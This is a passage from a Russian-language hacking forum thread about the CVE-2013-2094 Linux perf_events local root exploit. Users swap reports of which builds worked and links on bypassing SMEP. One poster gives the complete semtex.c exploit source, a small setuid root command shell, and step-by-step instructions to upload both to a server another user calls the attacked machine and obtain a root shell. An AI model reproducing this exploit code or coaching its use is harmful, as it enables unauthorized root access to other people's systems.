Старый 15.04.2014, 09:19   #91
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
переделал немного

CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86/x86_64

для локального использования, всё в одном файле, бекконект не нужен, выбирать из меню не нужно, в папке запуска создается ./suid

запуск сплойта:

Код:
sh run.sh
после получения суидника:

Код:
./suid "id;whoami"
without backconnect

x86:

abacus.zip - tested, ok
abacus1.zip - tested, no
abacus_xenpv.zip - tested, ok
Паша I love you)

2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 c abacus.zip +
}{оттабыч вне форума   Ответить с цитированием
Старый 26.04.2014, 13:20   #92
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

подскажите, обходится ли как то
Linux version 3.5.3
Цитата:
[-] SMEP detected, this exploit will very likely fail on recent kernels. Continue? (y/N)
euro вне форума   Ответить с цитированием
Старый 26.04.2014, 13:37   #93
SynQ
 
Регистрация: 11.07.2010
Сообщений: 954
Репутация: 352
По умолчанию

В паблике нет обхода SMEP. Приватно наверняка у кого-нибудь есть.
SynQ вне форума   Ответить с цитированием
Старый 26.04.2014, 13:43   #94
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

https://rdot.org/forum/archive/index.php/t-2443.html

бекпортируют на старые даже ядра, сучки

однако мысль для тех, кто хочет поиграться с обходом:

"но перезапись IDT не предотвращается"

https://bugzilla.redhat.com/show_bug.cgi?id=962792#c63

еще способ:

http://mainisusuallyafunction.blogspot.ru/2012/11/attacking-hardened-linux-systems-with.html - JIT spraying
https://github.com/kmcallister/alameda/blob/master/alameda.c - JIT spraying

Цитата:
This is a technique proof-of-concept, NOT A FULL EXPLOIT. It will
not get you root on any system unless the administrator has loaded
the incredibly insecure kernel module jump.ko, included with this
code under the ko/ subdirectory
и еще:

http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html

Цитата:
Exploit restrictions

Since the exploit tricks the kernel into executing user space pages it can be stopped by SMEP [7]. SMEP will cause the CPU to generate a fault if it is executing code from a user space page in kernel mode. Think of SMEP as kind of a DEP/NX for the kernel. To bypass SMEP the 20th bit of CR4 can be cleared through a ROP chain. Afterwards executing code in user space is possible. This technique is described in further detail in [8]. If no gadgets can be found for writing to the CR4 register exploitation would still be possible by writing the payload in ROP entirely. Also see the post in [9].
ну и обход SMEP на винде:

http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html

+ linux:

http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/

+ ROP way (Return-Oriented Programming):

http://trendround.com/Linux/--Beat-SMEP-on-Linux-with-Return-Oriented-Programming-%7C-falken&039;s-blog/59056

Цитата:
Other ideas to bypass SMEP
  • Disable SMEP by flipping the proper bit in CR4.
  • Allocate a RWX page, copy our shellcode and jump to it.
  • Store the ROP payload in userspace as SMEP does not prevent kernel code from accessing userland data.
оригинал с кодом был здесь (http://falken.tuxfamily.org/uploads/kernel_rop.tar.bz2):

http://falken.tuxfamily.org/?p=115

но сайта уже нет, попробовал через Wayback Machine - Internet Archive, нашел только текст:

http://web.archive.org/web/20120120072718/http://falken.tuxfamily.org/?p=115

+

https://twitter.com/daniel_bilar/status/134334272894009345

Последний раз редактировалось Pashkela; 26.04.2014 в 15:15..
Pashkela вне форума   Ответить с цитированием
Старый 29.04.2014, 11:26   #95
euro
 
Регистрация: 09.07.2010
Сообщений: 66
Репутация: 8
По умолчанию

2Pashkela,спасибо за инфу.Если кто-то может реализовать обход smep из инфы что выше напишите в пм
euro вне форума   Ответить с цитированием
Старый 10.05.2014, 10:17   #96
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

до мая 2013 только
vp$ вне форума   Ответить с цитированием
Старый 06.06.2014, 12:18   #97
Rashudo
 
Регистрация: 05.06.2014
Сообщений: 4
Репутация: 0
По умолчанию

Здравствуйте.
Помогите пожалуйста, может у кого завалялся скомпиленный файлик для x64?
Я уже все копья сломал. На атакуемой машине ядро 2.6.32-220.el6.x86_64, но нет gcc.
Нашел кое-как у себя centos c 2.6.32-042stab079.6, поставил gcc, начал компиляцию - получил exploit
Но при запуске ругается, что [-] System rejected creation of perf event.
Тогда я этот exploit портирую на атакуемую машину и запускаю там. Все проходит успешно до самого последнего момента, пишет, [+] Got root, а потом на создании suid ругается на gcc. И не создает его.
Нашел в сети файлик a.out под это ядро. Но он, видимо, был собран на 32-битной, потому что не может найти бибилотеки в папке /lib/, на атакуемой машине библиотеки лежат в папке /lib64/

Кто-нибудь может помочь? Опыта у меня в повышении прав нет совсем.
Rashudo вне форума   Ответить с цитированием
Старый 06.06.2014, 12:28   #98
Ravenous
 
Регистрация: 14.07.2012
Сообщений: 64
Репутация: 1
По умолчанию

Цитата:
Сообщение от Rashudo Посмотреть сообщение
Здравствуйте.
Помогите пожалуйста, может у кого завалялся скомпиленный файлик для x64?
Я уже все копья сломал. На атакуемой машине ядро 2.6.32-220.el6.x86_64, но нет gcc.
Нашел кое-как у себя centos c 2.6.32-042stab079.6, поставил gcc, начал компиляцию - получил exploit
Но при запуске ругается, что [-] System rejected creation of perf event.
Тогда я этот exploit портирую на атакуемую машину и запускаю там. Все проходит успешно до самого последнего момента, пишет, [+] Got root, а потом на создании suid ругается на gcc. И не создает его.
Нашел в сети файлик a.out под это ядро. Но он, видимо, был собран на 32-битной, потому что не может найти бибилотеки в папке /lib/, на атакуемой машине библиотеки лежат в папке /lib64/

Кто-нибудь может помочь? Опыта у меня в повышении прав нет совсем.
1. компиль на локалке
Код:
/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
  int i,j,k;
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
  uint64_t kbase = ((uint64_t)current)>>36;
  uint32_t *fixptr = (void*) AB(1);
  *fixptr = -1;

  for (i=0; i<4000; i+=4) {
    uint64_t *p = (void *)&current[i];
    uint32_t *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
      if (((uint32_t*)uids)[k] != t[j+k]) goto next;
      for (i = 0; i < 8; i++) t[j+i] = 0;
      for (i = 0; i < 10; i++) t[j+9+i] = -1;
      return;
next:;    }
  }
}

void sheep(uint32_t off) {
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
  int fd = syscall(298, buf, 0, -1, -1, 0);
  assert(!close(fd));
}


int  main() {
  uint64_t  u,g,needle, kbase, *p; uint8_t *code;
  uint32_t *map, j = 5;
  int i;
  struct {
    uint16_t limit;
    uint64_t addr;
  } __attribute__((packed)) idt;
  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
  memset(map, 0, SIZE);
  sheep(-1); sheep(-2);
  for (i = 0; i < SIZE/4; i++) if (map[i]) {
    assert(map[i+1]);
    break;
  }
  assert(i<SIZE/4);
  asm ("sidt %0" : "=m" (idt));
  kbase = idt.addr & 0xff000000;
  u = getuid(); g = getgid();
  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
  setresuid(u,u,u); setresgid(g,g,g);
  while (j--) {
    needle = AB(j+1);
    assert(p = memmem(code, 1024, &needle, 8));
    if (!p) continue;
    *p = j?((g<<32)|u):(idt.addr + 0x48);
  }
  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
  asm("int $0x4");  assert(!setuid(0));
  return execl("/bin/sh","/bin/sh", "-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL);
}
2. компиль exec.c
Код:
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
3. заливай на серв два полученых бинарника,запускай ./a.out и получай суидный exec2
Ravenous вне форума   Ответить с цитированием
Старый 06.06.2014, 15:31   #99
Rashudo
 
Регистрация: 05.06.2014
Сообщений: 4
Репутация: 0
По умолчанию

Цитата:
Сообщение от Ravenous Посмотреть сообщение
1. компиль на локалке
Код:
/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
  int i,j,k;
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
  uint64_t kbase = ((uint64_t)current)>>36;
  uint32_t *fixptr = (void*) AB(1);
  *fixptr = -1;

  for (i=0; i<4000; i+=4) {
    uint64_t *p = (void *)&current[i];
    uint32_t *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
      if (((uint32_t*)uids)[k] != t[j+k]) goto next;
      for (i = 0; i < 8; i++) t[j+i] = 0;
      for (i = 0; i < 10; i++) t[j+9+i] = -1;
      return;
next:;    }
  }
}

void sheep(uint32_t off) {
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
  int fd = syscall(298, buf, 0, -1, -1, 0);
  assert(!close(fd));
}


int  main() {
  uint64_t  u,g,needle, kbase, *p; uint8_t *code;
  uint32_t *map, j = 5;
  int i;
  struct {
    uint16_t limit;
    uint64_t addr;
  } __attribute__((packed)) idt;
  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
  memset(map, 0, SIZE);
  sheep(-1); sheep(-2);
  for (i = 0; i < SIZE/4; i++) if (map[i]) {
    assert(map[i+1]);
    break;
  }
  assert(i<SIZE/4);
  asm ("sidt %0" : "=m" (idt));
  kbase = idt.addr & 0xff000000;
  u = getuid(); g = getgid();
  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
  setresuid(u,u,u); setresgid(g,g,g);
  while (j--) {
    needle = AB(j+1);
    assert(p = memmem(code, 1024, &needle, 8));
    if (!p) continue;
    *p = j?((g<<32)|u):(idt.addr + 0x48);
  }
  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
  asm("int $0x4");  assert(!setuid(0));
  return execl("/bin/sh","/bin/sh", "-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL);
}
2. компиль exec.c
Код:
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
3. заливай на серв два полученых бинарника,запускай ./a.out и получай суидный exec2
- На локалке написал
- gcc -O2 semtex.c
- Получил a.out
- написал gcc exec.c - ничего не скомпилилось.
- залил ради теста a.out на атакуемую машину
- ./a.out ничего не дает

Код:
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
Что вообще должно отсюда скомпилиться?
Rashudo вне форума   Ответить с цитированием
Старый 06.06.2014, 15:37   #100
Ravenous
 
Регистрация: 14.07.2012
Сообщений: 64
Репутация: 1
По умолчанию

Пздц)
Сделай пункт 1 еще раз. Потом
gcc -o exec exec.c
появится файл exec.
Скопируй на сервак 2 этих файла a.out(новый) и exec. потом запусти a.out, и появится суидный exec2.

Скомпилируется cmd-шелл.

Последний раз редактировалось Ravenous; 06.06.2014 в 15:40..
Ravenous вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot